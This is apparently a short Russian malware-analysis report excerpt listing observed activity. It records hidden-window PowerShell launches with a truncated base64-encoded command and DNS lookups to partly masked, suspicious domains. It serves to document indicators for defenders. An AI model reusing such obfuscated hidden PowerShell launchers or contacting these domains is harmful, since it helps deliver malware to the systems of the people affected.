Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAGsAQQBjAEMAXwA0AEcAQQB4AEQAWAA9ACcAUwBBAGMARwBYAEIAQQBCAEEAMQBYACcAOwAkAEUARAA0AEIAeAAxADQAbwBrAC...
- DNS ASK lu####ttours.com
- DNS ASK ro####bagger.com
- DNS ASK ra###l-may.com
- DNS ASK za##a.com
- DNS ASK jk###drobe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAGsAQQBjAEMAXwA0AEcAQQB4AEQAWAA9ACcAUwBBAGMARwBYAEIAQQBCAEEAMQBYACcAOwAkAEUARAA0AEIAeAAxADQAbwBrAC...' (со скрытым окном)